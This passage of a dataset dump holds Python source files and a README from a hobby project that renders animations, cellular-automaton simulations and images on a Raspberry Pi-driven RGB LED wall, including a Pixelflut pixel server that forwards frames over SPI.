xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid3 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxxyyyyyyyyxxv.-\nvx xxyyyyxx xv-\nx xxxx x-\nvx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid4 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxxyyyyyyyyxxv.-\nvxyyyyyyyyyyyyxv-\nx xxyyyyyyyxxx x-\nvx xxxxxxxx xv-\n.vx xv.-\n..vxx xxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlid5 = \"\"\"\n................-\n.....vxxxxv.....-\n...vxxyyyyxxv...-\n.vxxyyyyyyyyxxv.-\nvxyyyyyyyyyyyyxv-\nxyyyyyyyyyyyyyyx-\nvxyyyyyyyyyyyyxv-\n.vxyyyyyyyyyyxv.-\n..vxxyyyyyyxxv..-\n....vxxxxxxv....-\n................-\n\"\"\"\n\nlids = [lid1, lid1, lid1, lid4, lid5]\n\ncmap = {\n \".\": [0x00, 0x00, 0x00],\n \"w\": [0xd8, 0xd8, 0xd8],\n \"X\": [0x80, 0x80, 0x80],\n \"x\": [0xea//2, 0xc0//2, 0x86//2],\n \"v\": [0xea//6, 0xc0//6, 0x86//6],\n \"y\": [0xea, 0xc0, 0x86],\n \"b\": [0xff, 0xff, 0xff],\n}\n\nc2map = [\n # blue\n {\n \"a\": [0x00, 0x6d, 0xcc],\n \"o\": [0x02, 0x24, 0x3d],\n },\n # green\n {\n \"a\": [0x02, 0xbb, 0x39],\n \"o\": [0x01, 0x3d, 0x09]\n },\n # yellow\n {\n \"a\": [0xac, 0xbc, 0x01],\n \"o\": [0x3b, 0x3c, 0x00]\n },\n # red\n {\n \"a\": [0xb5, 0x51, 0x03],\n \"o\": [0x3c, 0x16, 0x01]\n }\n]\n\n\ndef draw(a, s, trans=None, colour=0):\n if trans is None:\n trans = (0, 0)\n h, w, d = np.shape(a)\n y = -1\n for line in s.split(\"\\n\"):\n if not line:\n continue\n y += 1\n if y >= h:\n break\n _y = y + trans[0]\n if not 0 <= _y < h:\n continue\n for x, c in enumerate(line):\n if x >= w:\n break\n _x = x + trans[1]\n if not 0 <= _x < w:\n continue\n if c in cmap:\n a[_y, _x] = cmap[c]\n else:\n if 0 <= colour < len(c2map):\n if c in c2map[colour]:\n a[_y, _x] = c2map[colour][c]\n\n\nclass Eye:\n blinking = [1, 2, 3, 4, 4, 4, 4, 3, 2, 1]\n\n def __init__(self):\n self.direction = (0, 0)\n self.colour = 0\n self.lid_pos = 0\n self.action = None\n self.progress = None\n self.idle_time = None\n self.idle_next = None\n self.start_action(\"idle\")\n\n def update(self):\n self.progress += 1\n if self.action == \"close\":\n if self.progress <= 4:\n self.lid_pos = self.progress\n else:\n self.start_action(\"closed\")\n elif self.action == \"closed\":\n if self.progress > 2:\n self.change_colour()\n self.start_action(\"open\")\n elif self.action == \"open\":\n if 1 <= self.progress <= 4:\n self.lid_pos = 4 - self.progress\n else:\n self.start_action(\"idle\")\n elif self.action == \"move\":\n self.change_direction()\n self.start_action(\"idle\")\n elif self.action == \"idle\":\n if self.progress >= self.idle_time:\n self.start_action(self.idle_next)\n\n def start_action(self, action):\n self.action = action\n self.progress = 0\n if action == \"idle\":\n self.idle_time = random.randint(30, 120)\n if random.randint(1, 10) == 1:\n self.idle_next = \"close\"\n else:\n self.idle_next = \"move\"\n\n def change_direction(self):\n self.direction = (random.randint(-2, 2), random.randint(-3, 3))\n\n def change_colour(self):\n if random.randint(1, 5) == 1:\n self.colour = random.randint(0, len(c2map) - 1)\n\n def draw(self):\n a = np.zeros((11, 16, 3), dtype=np.uint8)\n draw(a, ball)\n draw(a, iris, self.direction, colour=self.colour)\n draw(a, lids[self.lid_pos])\n return a\n\n\nfluter = Fluter()\n\ntop_off = (0, 0)\n\na = np.zeros((24, 16, 3), dtype=np.uint8)\ntop = Eye()\nbot = Eye()\n\nwhile True:\n a[:11,:,:] = top.draw()\n a[13:24,:,:] = bot.draw()\n fluter.send_array(a)\n top.update()\n bot.update()\n time.sleep(.05)\n" }, { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.630476176738739, "avg_line_length": 22.81818199157715, "blob_id": "46171e6d3b6fe9580735e55b9a7a6c7ad06672f4", "content_id": "415b7f6bd630701efb955276f15d4f021e6922cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 525, "license_type": "no_license", "max_line_length": 70, "num_lines": 22, "path": "/raspi_preproc/audio_beatdetection.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import datetime\nimport numpy as np\n\n\nclass AudioBeatdetection:\n\n def __init__(self, _num_leds_h=16, _num_leds_v=24):\n self.num_leds_h = _num_leds_h\n self.num_leds_v = _num_leds_v\n self.leds = np.zeros((_num_leds_v, _num_leds_h, 3))\n\n self.last_measurement = datetime.datetime.now()\n\n #TODO\n\n def generate_frame(self, pattern=0):\n\n # TODO trigger the measurements for beat detection\n\n # TODO trigger some neat visualisations (based on pattern arg)\n\n return self.leds\n\n" }, { "alpha_fraction": 0.6137373447418213, "alphanum_fraction": 0.6193939447402954, "avg_line_length": 27.779069900512695, "blob_id": "99f9e1775e076f4eb69f98eb3ff1ff4b83f81a54", "content_id": "8e04ef5df62ff12c1bf57c19c5c4c100a763dced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "no_license", "max_line_length": 93, "num_lines": 86, "path": "/raspi_preproc/image_loader.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nimport random\nfrom PIL import Image\nfrom PIL import ImageEnhance\n\n_FORMAT = \"RGB\"\n\nclass ImageLoader:\n\n def __init__(self, _num_leds_h=16, _num_leds_v=24):\n self.num_leds_h = _num_leds_h\n self.num_leds_v = _num_leds_v\n self.leds = np.zeros((_num_leds_v, _num_leds_h, 3)) #should be not necessary\n\n self.black = (0, 0, 0)\n self.ipath = \"../images\"\n self.default_image_name = \"black.png\"\n self.image_name = self.default_image_name\n self.get_image_list()\n self.img_leds = Image.new(_FORMAT, (self.num_leds_h, self.num_leds_v), self.black)\n\n self.load_image(self.default_image_name)\n\n\n def enhance_image(self, img):\n factor = 1.5\n converter = ImageEnhance.Color(img)\n return converter.enhance(factor)\n\n\n def get_image_list(self):\n self.image_list = [f for f in listdir(self.ipath) if isfile(join(self.ipath, f))]\n\n self.image_list.sort()\n\n return\n\n def load_image(self, name):\n if any(name in n for n in self.image_list):\n self.img_leds = Image.open(self.ipath+\"/\"+name).\\\n resize((self.num_leds_h, self.num_leds_v)).convert(\"RGB\")\n\n self.img_leds = self.enhance_image(self.img_leds)\n\n self.leds = np.array(self.img_leds)\n return self.leds\n\n def load_random_image(self):\n self.image_name = self.image_list[random.randint(0, len(self.image_list)-1)]\n\n return self.load_image(self.image_name)\n\n def load_next_image(self):\n\n pos = self.image_list.index(self.image_name)\n self.image_name = self.image_list[(pos+1)%len(self.image_list)]\n\n return self.load_image(self.image_name)\n\n def load_prev_image(self):\n\n pos = self.image_list.index(self.image_name)\n self.image_name = self.image_list[(len(self.image_list)+pos-1)%len(self.image_list)]\n\n return self.load_image(self.image_name)\n\n def load_numbered_image(self, number):\n\n self.image_name = self.image_list[(number+len(self.image_list))%len(self.image_list)]\n\n return self.load_image(self.image_name)\n\n\n#for debug:\nif __name__ == \"__main__\":\n\n iload = ImageLoader()\n\n leds = iload.load_random_image()\n print(iload.ipath+\"/\"+iload.image_name)\n print(\"debug -\", \"leds:\", leds.shape)\n Image.fromarray(leds).save(\"leds.png\", \"PNG\")\n\n #img.convert(\"RGB\").save(\"leds.png\", \"PNG\")\n" }, { "alpha_fraction": 0.63246750831604, "alphanum_fraction": 0.6883116960525513, "avg_line_length": 19.783782958984375, "blob_id": "5808b3395e24d44eeaf5ebbf8462e901bb465902", "content_id": "b4b05f877e6cfa6fe8e485b2c21a74b63491b1cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 770, "license_type": "no_license", "max_line_length": 138, "num_lines": 37, "path": "/pixelflut/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# Pixelflut @ tetriswall\n\n## Setup\n\n $ virtualenv -p python3 flut\n\t$ . flut/bin/activate\n\t$ pip install -r requirements.txt\n\nDebian packages you might need:\n\n- `libcairo2-dev`\n\n## Running in canvas mode\n\nCanvas mode is just a dummy server to draw pixels on a cairo canvas.\nStart:\n\n $ python pixelflut.py canvas_brain.py\n\n## Running in SPI mode\n\nThis mode is for the tetris wall and makes sure that the dimensions\nof the wall are respected.\nStart:\n\n\t$ DISPLAY=:0.0 python pixelflut.py spi_brain.py\n\t\n\n## Quick test\n\nSet one pixel at x=10, y=10 to green:\n\n\t$ echo 'PX 10 10 #00AA00' | nc -q1 localhost 1234\n\nDraw some lines:\n\n\t$ for j in `seq 0 5 100`; do for i in {0..640}; do echo \"px $i $j #AA0000\"; echo \"px $j $i #00AA00ff\"; done; done | nc -q1 localhost 1234\n\n" }, { "alpha_fraction": 0.5852307677268982, "alphanum_fraction": 0.6138461828231812, "avg_line_length": 20.95945930480957, "blob_id": "dbdad29cdbcb745cb5880062ce2e92e4aed59a11", "content_id": "e8900967cd01e0aa3e1ef8061ae5c9dc5501601a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3250, "license_type": "no_license", "max_line_length": 74, "num_lines": 148, "path": "/pixelflut/spi_brain.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import logging\nimport base64\n\nimport pigpio\nfrom pygame.surfarray import array3d\n\n# GPIO pin numbers\nSYNC_PIN = 24\n# canvas parameters\nCANVAS_WIDTH = 16\nCANVAS_HEIGHT = 24\n\nlog = logging.getLogger('brain')\nlog.debug('lol')\n\n\nticks = 0\n\ntry:\n pi = pigpio.pi()\n spi = pi.spi_open(0, 500000, 0) # 243750 487500 975000 1950000\n pi.set_mode(SYNC_PIN, pigpio.INPUT) # define pulldown/pullup\nexcept:\n # Possibly the gpio daemon broke or we are not running on a pi.\n input('Continue?')\n pi = None\n spi = None\n\n\ndef send_canvas_over_spi(canvas):\n global spi, array3d, pi\n global CANVAS_WIDTH, CANVAS_HEIGHT, SYNC_PIN\n global log\n import numpy as np\n\n log.debug('send_canvas_over_spi')\n\n leds = array3d(canvas.screen).astype('uint8')\n leds = leds[:CANVAS_WIDTH, :CANVAS_HEIGHT, :]\n #leds = np.random.uniform(0, 1, size=(16, 24, 3)) * 255\n #leds = leds.astype('uint8')\n data = leds.flatten().tobytes()\n\n # just wait, until the sync pin is set\n while ((pi.read_bank_1() >> SYNC_PIN) & 1) != 1:\n pass\n\n (num, byte) = pi.spi_read(spi, 1)\n\n pi.spi_write(spi, data)\n\n\n@on('LOAD')\ndef load(canvas):\n log.debug('load event')\n\n return # remove if canvas should be resized as well\n\n global CANVAS_WIDTH, CANVAS_HEIGHT\n import pygame\n size = CANVAS_WIDTH, CANVAS_HEIGHT\n canvas.screen = pygame.display.set_mode(size, canvas.flags)\n canvas.width, canvas.height = size\n\n\n@on('RESIZE')\ndef resize(canvas):\n global log\n log.debug('resize event')\n\n\n@on('QUIT')\ndef quit(canvas):\n global log\n log.debug('quit event')\n\n\n@on('TICK')\ndef tick(canvas):\n global log\n global ticks\n global send_canvas_over_spi\n if ticks % 50 == 0:\n print('.')\n\n # TODO: it would be best to have this here but it blocks everything :/\n send_canvas_over_spi(canvas)\n\n ticks += 1\n\n\n@on('CONNECT')\ndef connect(canvas, client):\n global log\n log.debug('connect event %s', client)\n\n\n@on('DISCONNECT')\ndef disconnect(canvas, client):\n global log\n log.debug('disconnect event %s', client)\n\n\n@on('COMMAND-PX')\ndef command_px(canvas, client, *args):\n global log\n global send_canvas_over_spi\n log.debug('px command event %s %s', client, args)\n assert len(args) == 3\n\n x, y, c = args\n c = c.lower().strip('#')\n\n assert x.isdecimal()\n assert y.isdecimal()\n assert 6 <= len(c) <= 8\n\n # pad optional alpha\n c += 'f' * (8 - len(c))\n\n x, y = int(x), int(y)\n r, g, b, a = tuple(int(c[i:i+2], 16) for i in (0, 2, 4, 6))\n\n canvas.set_pixel(x, y, r, g, b, a)\n #send_canvas_over_spi(canvas)\n return True\n\n\n@on('COMMAND-WL')\ndef command_wl(canvas, client, *args):\n global log, base64\n global send_canvas_over_spi\n log.debug(\"wl command event %s %d args\", client, len(args))\n w, h = canvas.size\n raw_size = w * h * canvas.depth\n b64_size = int(raw_size + raw_size/3)\n assert len(args) == 1\n base = args[0]\n assert len(base) == b64_size\n data = base64.b64decode(base)\n assert len(data) == raw_size\n\n for y in range(h):\n for x in range(w):\n p = (y*w + x) * 3\n canvas.set_pixel(x, y, data[p], data[p+1], data[p+2], 0xff)\n #send_canvas_over_spi(canvas)\n return True\n" }, { "alpha_fraction": 0.659919023513794, "alphanum_fraction": 0.6659919023513794, "avg_line_length": 21.976743698120117, "blob_id": "b683b6ce1ad638164385c732b17740b4e342b127", "content_id": "dc907d18ca906436d4bc117d899fc1cd9f9ec574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 988, "license_type": "no_license", "max_line_length": 72, "num_lines": 43, "path": "/reels/slowimg.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nImage sending reel using PX command.\n\nSimple reel that sends random images from a directory to the Wall.\nUses the standard pixelflut PX command to send one pixel at a time.\nThis is very slow and you can see the image change.\n\nCreated by kratenko.\n\"\"\"\nimport os\nimport random\nimport time\n\nimport numpy as np\nfrom PIL import Image\n\nfrom fluter import Fluter\n\nfluter = Fluter()\n\n\ndef get_random_file(path):\n \"\"\"\n Returns a random filename, chosen among the files of the given path.\n \"\"\"\n files = os.listdir(path)\n index = random.randrange(0, len(files))\n return os.path.join(path, files[index])\n\n\ndef send(img):\n arr = np.array(img)\n for i in range(0, img.size[0]):\n for j in range(0, img.size[1]):\n fluter.send_pixel((i, j), arr[j, i])\n\n\nwhile True:\n # prepare image (open, convert to rgba, resize, convert to array)\n fn = get_random_file(\"../images\")\n print(\"sending image '{}'\".format(fn))\n send(Image.open(fn))\n time.sleep(1)\n" }, { "alpha_fraction": 0.4145016670227051, "alphanum_fraction": 0.4307982921600342, "avg_line_length": 25.462499618530273, "blob_id": "cd4509f3df29a80983b11bd4c587e86cbe0fff2b", "content_id": "f3079f1e4cc08cb46b61025655f92e371b2935ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4234, "license_type": "no_license", "max_line_length": 83, "num_lines": 160, "path": "/reels/wator.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nRGB Reel Wator Simulation\n\nA reel implementing the Wator Simulation. Uses the energy based version for\nthe predators. When the simulation hits either final state it restarts.\n\nTODO: configuration of parameters from outside (program args)\nTODO: biased initialization\nTODO: non-energy-based variant\n\nSee https://en.wikipedia.org/wiki/Wa-Tor\n\nCreated by kratenko\n\"\"\"\nimport numpy as np\nimport random\nimport time\nimport math\nimport os\nfrom PIL import Image\n\nfrom fluter import Fluter\n\nW, H = 16, 24\n\nf = np.random.randint(-1, 2, size=(H, W), dtype=np.int16)\n\nFISH_BREED = 3\nFISH_ENERGY = 5\nSHARK_STARVE = 2\nSHARK_BREED = 10\n\nfluter = Fluter()\nimg_skull = Image.open(os.path.join(\"img\", \"skull.png\"))\nimg_fish = Image.open(os.path.join(\"img\", \"cheep-cheep-blue.png\"))\n\n\ndef send(f):\n water = [0, 0, 0]\n fish = [0, 0, 0xff]\n shark = [0, 0xff, 0]\n d = np.zeros((H, W, 3), dtype=np.uint8)\n d[f<0] = shark\n d[f==0] = water\n d[f>0] = fish\n fluter.send_array(d)\n\n\ndef get_neigh(y, x):\n # no diagonal:\n return [((y - 1) % H, x), (y, (x + 1) % W), ((y + 1) % H, x), (y, (x - 1) % W)]\n\n\ndef dest_condition(f, y, x, condition):\n neigh = get_neigh(y, x)\n if condition == 0:\n conditioned = [a for a in neigh if f[a] == 0]\n elif condition == 1:\n conditioned = [a for a in neigh if f[a] > 0]\n else:\n conditioned = []\n if conditioned:\n return random.choice(conditioned)\n else:\n return None\n\n\ndef move_fish(f):\n moved = np.zeros((H, W), dtype=bool)\n for y in range(H):\n for x in range(W):\n if f[y, x] > 0:\n # fish\n if not moved[y, x]:\n dest = dest_condition(f, y, x, 0)\n if dest:\n val = f[y, x] + 1\n if val >= FISH_BREED:\n f[dest] = 1\n f[y, x] = 1\n else:\n f[dest] = val\n f[y, x] = 0\n moved[dest] = True\n else:\n f[y, x] = min(f[y, x] + 1, FISH_BREED)\n moved[y, x] = True\n\n\ndef move_shark(f):\n moved = np.zeros((H, W), dtype=bool)\n for y in range(H):\n for x in range(W):\n if f[y, x] < 0:\n # shark\n if not moved[y, x]:\n dest = dest_condition(f, y, x, 1)\n if dest:\n # find fish\n f[dest] = f[y, x] - FISH_ENERGY\n if f[dest] < -SHARK_BREED:\n # breed new shark\n val = f[dest]\n f[dest] = math.floor(val/2)\n f[y, x] = math.ceil(val/2)\n moved[dest] = True\n moved[y, x] = True\n else:\n f[y, x] = 0\n moved[dest] = True\n elif f[y, x] <= 1:\n # starved to death:\n f[y, x] = 0\n else:\n # no fish, just move\n dest = dest_condition(f, y, x, 0)\n if dest:\n f[dest] = f[y, x] - 1\n f[y, x] = 0\n moved[dest] = True\n else:\n f[y, x] -= 1\n moved[y, x] = True\n\n\ndef step(f):\n move_fish(f)\n move_shark(f)\n\n\nfields = W * H\nruns = 1\nsteps = 0\n\ndef redo():\n global f, steps, runs\n steps = 0\n runs += 1\n f = np.random.randint(-1, 2, size=(H, W), dtype=np.int16)\n\n\nwhile True:\n fish = np.sum(f>0)\n sharks = np.sum(f<0)\n print(\"Run %d, Step %d -- Fish: %d, Sharks: %d\" % (runs, steps, fish, sharks))\n send(f)\n # eval\n if fish == 0 and sharks == 0:\n fluter.send_image(img_skull)\n time.sleep(2)\n redo()\n continue\n elif fish == fields:\n fluter.send_image(img_fish)\n time.sleep(2)\n redo()\n continue\n step(f)\n steps += 1\n time.sleep(.2)\n" }, { "alpha_fraction": 0.5439143776893616, "alphanum_fraction": 0.6032099723815918, "avg_line_length": 29.310810089111328, "blob_id": "b5dd5e5f637d537108ad0e726b117331eb336d58", "content_id": "e7ba5f62f3322a2a45abda6e999b534a973d697e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2243, "license_type": "no_license", "max_line_length": 113, "num_lines": 74, "path": "/raspi_preproc/workbench/test_spi.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import serial\nimport time\nimport datetime\nimport base64\nimport pigpio\n\nUSBPORT = '/dev/ttyACM0' #check correct port first\n#USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 #16\nNUM_LEDS_V = 24 #24\nFPS = 25\nWAITTIME_VSTREAM = 0.040 #40 ms\nWAITTIME_ISTREAM = 1.0 #40 ms\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\n#s = serial.Serial(USBPORT, 115200) #57600 dc115200 230400\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect spi\")\n exit()\n\n#spi = pi.spi_open(0, 115200)\nspi = pi.spi_open(0, 64000//2)\n\nleds = [[0 for i in range(NUM_LEDS_V)] for j in range(NUM_LEDS_H)]\ncounter = 0\ndelaycounter = 1\ndelay = 1 #FPS 1 for testing\ndata_read = 0\n\nprint(\"Start sending\")\ncnt = 0\nwhile True:\n timestart = datetime.datetime.now()\n\n #data_read = s.read(1)\n (num_bytes, data_read) = pi.spi_read(spi, 1)\n #(num_bytes, data_read) = (0,1)\n #data_read = int(data_read)\n # mode - video stream: 25 frames per second with 6 bit/px\n if (True or data_read==b'3'):\n for i in range(NUM_LEDS_H):\n for j in range(NUM_LEDS_V):\n #leds[i][j] = (4*(counter-i+j))%64\n #leds[i][j] = (4*(counter-i+j))%64\n #leds[i][j] = 256//NUM_LEDS_V*((counter+i+j)%NUM_LEDS_V)\n leds[i][j] = 1\n if (delaycounter%delay == 0):\n counter=(counter+1)%NUM_LEDS_H\n delaycounter=(delaycounter+1)%delay\n\n data_b64 = ''.join(b64dict[m] for n in leds for m in n)\n data_dec = base64.b64decode(data_b64)\n #print(len(data_b64),data_b64)\n #print(len(data_dec),data_dec)\n\n \n #pi.spi_write(spi, data_dec+b'\\n')\n cnt+=1\n pi.spi_write(spi, bytes('Take this: %d\\n\\n' % cnt, encoding=\"utf-8\"))\n print(\"CNT:\", cnt)\n #pi.spi_xfer(spi, data_dec)\n #s.write(bytes([m for n in leds for m in n])) #undecoded format\n #spi.flush()\n\n timefin = datetime.datetime.now()\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart).microseconds))\n print(\"arduino_mode:\",data_read,\"process_t:\", 0.000001*(timefin-timestart).microseconds, \"wait_t:\", waittime)\n\n time.sleep(waittime) \n\npi.spi_close(spi)\npi.stop()\n" }, { "alpha_fraction": 0.6635220050811768, "alphanum_fraction": 0.7295597195625305, "avg_line_length": 25.5, "blob_id": "8df5c51d469b5e0323c3221783b22b00f06c3480", "content_id": "cf55c11b90ea66148dad7916269e01d70cff9bbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 38, "num_lines": 12, "path": "/raspi_preproc/workbench/streaming/util/capture_single.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from pyv4l2.frame import Frame\nfrom pyv4l2.control import Control\n\nframe = Frame('/dev/video1')\nframe_data = frame.get_frame()\ncontrol = Control(\"/dev/video1\")\n#control.get_controls()\n#control.get_control_value(9963776)\n#control.set_control_value(9963776, 8)\n\nwith open('test.raw', 'wb') as f:\n f.write(frame_data)\n" }, { "alpha_fraction": 0.3816167414188385, "alphanum_fraction": 0.40131309628486633, "avg_line_length": 17.8914737701416, "blob_id": "598becc7949b7467951ef663658e0b2b022375a8", "content_id": "d1dcc69498eeec879e3d08810ed69a43fc555eff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2437, "license_type": "no_license", "max_line_length": 70, "num_lines": 129, "path": "/reels/wireworld.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\"\nWireworld Reel\n\nImplementation for Wireworld for our RGB-Wall\n\nSee https://en.wikipedia.org/wiki/Wireworld\n\nTODO: multiple board layouts to chose from by program parm\nTODO: set board layout by program parm\n\nCreated by kratenko\n\"\"\"\n\nimport numpy as np\nimport time\n\nfrom fluter import Fluter\n\nfluter = Fluter()\nW, H = 16, 24\n\nEMPTY = 0\nWIRE = 1\nHEAD = 2\nTAIL = 3\n\nb_xor = \"\"\"\n..............x.\n....x.....x...x.\n...x.o...x.o..x.\n...x.+...x.+..x.\n...x.x...x.x..x.\n...+.x...x.x..x.\n...o.x...x.x..x.\n...x.x...x.x..x.\n...x.x...x.o..x.\n...x.x...x.+..x.\n....x.....x...x.\n....x.....x...x.\n....x.....x...x.\n....x.....x...x.\n....x.xxx.x...x.\n.....xx.xx....x.\n......x.x.....x.\n......xxx.....x.\n.......x......x.\n.......x......x.\n.......x......x.\n.......x......x.\n........xxxxxx..\n................\n\"\"\"\n\n\ndef build_field(s):\n f = np.zeros((H, W), dtype=np.uint8)\n y = -1\n for line in s.split(\"\\n\"):\n line = line.strip()\n if not line:\n continue\n y += 1\n if y >= H:\n break\n for x, c in enumerate(line):\n if x >= W:\n break\n t = EMPTY\n if c == \"x\":\n t = WIRE\n elif c == \"+\":\n t = HEAD\n elif c == \"o\":\n t = TAIL\n f[y, x] = t\n return f\n\n\ndef moore_neigh(pos):\n y, x = pos\n n = ((y - 1, x - 1), (y - 1, x), (y - 1, x + 1),\n (y, x - 1), (y, x + 1),\n (y + 1, x - 1), (y + 1, x), (y + 1, x + 1))\n n = tuple(pos for pos in n if 0 <= pos[1] < W and 0 <= pos[0] < H)\n return n\n\n\ndef count_neigh_heads(f, pos):\n n = moore_neigh(pos)\n s = 0\n for p in n:\n if f[p] == HEAD:\n s += 1\n return s\n\n\ndef step(f):\n o = f.copy()\n for y in range(0, H):\n for x in range(0, W):\n if f[y, x] == HEAD:\n o[y, x] = TAIL\n elif f[y, x] == TAIL:\n o[y, x] = WIRE\n elif f[y, x] == WIRE:\n if 1 <= count_neigh_heads(f, (y, x)) <= 2:\n o[y, x] = HEAD\n return o\n\n\ndef send(f):\n empty = [0, 0, 0]\n wire = [0xff, 0xff, 0]\n head = [0, 0, 0xff]\n tail = [0xff, 0, 0]\n d = np.zeros((H, W, 3), dtype=np.uint8)\n d[f == EMPTY] = empty\n d[f == WIRE] = wire\n d[f == HEAD] = head\n d[f == TAIL] = tail\n fluter.send_array(d)\n\n\nf = build_field(b_xor)\n\nwhile True:\n send(f)\n f = step(f)\n time.sleep(.2)\n" }, { "alpha_fraction": 0.5093240141868591, "alphanum_fraction": 0.560606062412262, "avg_line_length": 25.8125, "blob_id": "c6f0a03f65be207f85c05c7ba1997dd1f14252c4", "content_id": "93da438566d067cb06374edeeb1a5867fe8c8bdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 57, "num_lines": 32, "path": "/raspi_preproc/workbench/streaming/lib/cropping.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# QnD extraction pixels from screenshot\nfrom PIL import Image\n\n\ndef extract_single_player_area(im, area=None):\n if area is None:\n area = (96, 40, 96+10*8, 40+20*8)\n return im.crop(area)\n\ndef extract_square(im, coords):\n sx, sy = coords\n square = (sx*8, sy*8, (sx+1)*8, (sy+1)*8)\n return im.crop(square)\n\ndef extract_colours(area):\n print(area)\n a = area.crop((0, 0, 10, 20)).copy()\n dx = area.width / 10\n dy = area.height / 20\n print(dx, dy)\n for y in range(20):\n for x in range(10):\n at = (int(x*dx + (dx/2)), int(y*dy + (dy/2)))\n pix = area.getpixel(at)\n a.putpixel((x, y), pix)\n print(a)\n return a\n\nif __name__ == \"__main__\":\n im = Image.open(\"img/Tetris (USA)-10.png\")\n area = extract_single_player_area(im)\n extract_colours(area).resize((8*10, 8*20)).show()\n" }, { "alpha_fraction": 0.5200076699256897, "alphanum_fraction": 0.5453156232833862, "avg_line_length": 38.06716537475586, "blob_id": "3d35ea41780499035820745a0f8d422feaf7e2f7", "content_id": "f14d9e0d78472a68e4fe3ddf00cc495ddd0464d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10471, "license_type": "no_license", "max_line_length": 178, "num_lines": 268, "path": "/raspi_preproc/controller.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import datetime\nimport numpy as np\nimport pigpio\nfrom threading import Thread\nfrom queue import Queue\nimport time\nimport sys\nfrom utils_ui import Logger\nimport stream_pixelflut as pixelflut\n#import sys\n#sys.path.append(\"..\")\n#from pixelflut import pixelflut\nfrom stream_nes import StreamNES\nfrom image_loader import ImageLoader\nfrom audio_beatdetection import AudioBeatdetection\n\nDEBUG_MODE = True\n\nexptime = datetime.datetime.now()\nlog_out_file = \"logs/log_\" + exptime.strftime(\"%y%m%d%H%M\") + \".txt\"\nsys.stdout = Logger(output_file=log_out_file)\nis_first_loop = True\n\nprint(\"rgb-tetris-wall raspi reprocessing - start -\", exptime.strftime(\"%y%m%d%H%M\"))\n\nif DEBUG_MODE:\n print(\"debug -\", \"raspberry PI preprocessing - start\")\n\nUSBPORT = '/dev/ttyACM0' # check correct port first\n# USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 # 16\nNUM_LEDS_V = 24 # 24\nFPS = 25\nPOLL_GRACE_PERIOD = 0.001 # mainly for debug.\n#waittime_until_next_image = 30.0 # change the random image every 5 minutes\nthreshold_until_next_image = 10 # change the random image every 10th time.\n#time_last_istream_change = datetime.datetime.now()\nnext_image_counter = threshold_until_next_image\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\n# initialise SPI\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect SPI\")\n exit()\nspi = pi.spi_open(0, 500000, 0) # 243750 487500 975000 1950000\n\n# initialise pin to arduino for flagging synchronisation\nSYNC_PIN = 24 # GPIO pin numbers\npi.set_mode(SYNC_PIN, pigpio.INPUT) # define pulldown/pullup\n\nleds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\nmode = 0\nsubmode = [0 for n in range(256)]\n\niloader = ImageLoader(_num_leds_h=NUM_LEDS_H, _num_leds_v=NUM_LEDS_V)\nstrmnes = StreamNES(_num_leds_h=NUM_LEDS_H, _num_leds_v=NUM_LEDS_V, _ntsc=True)\nabeatd = AudioBeatdetection(_num_leds_h=NUM_LEDS_H, _num_leds_v=NUM_LEDS_V)\npixelflut_queue = Queue()\npixelflut_thread = Thread(target=pixelflut.threaded,\n args=(pixelflut_queue,'pixelflut_brain.py'))\npixelflut_thread.start()\npixelflut_read = pixelflut_queue.get(timeout=5)\n\ntime.sleep(0.4) # some needed initial delay\n\ndef decodeByte2Mode(byte):\n # first two bits code the mode and remaining 6 bits code the submode\n return (byte >> 6) + 1, byte & ~(3 << 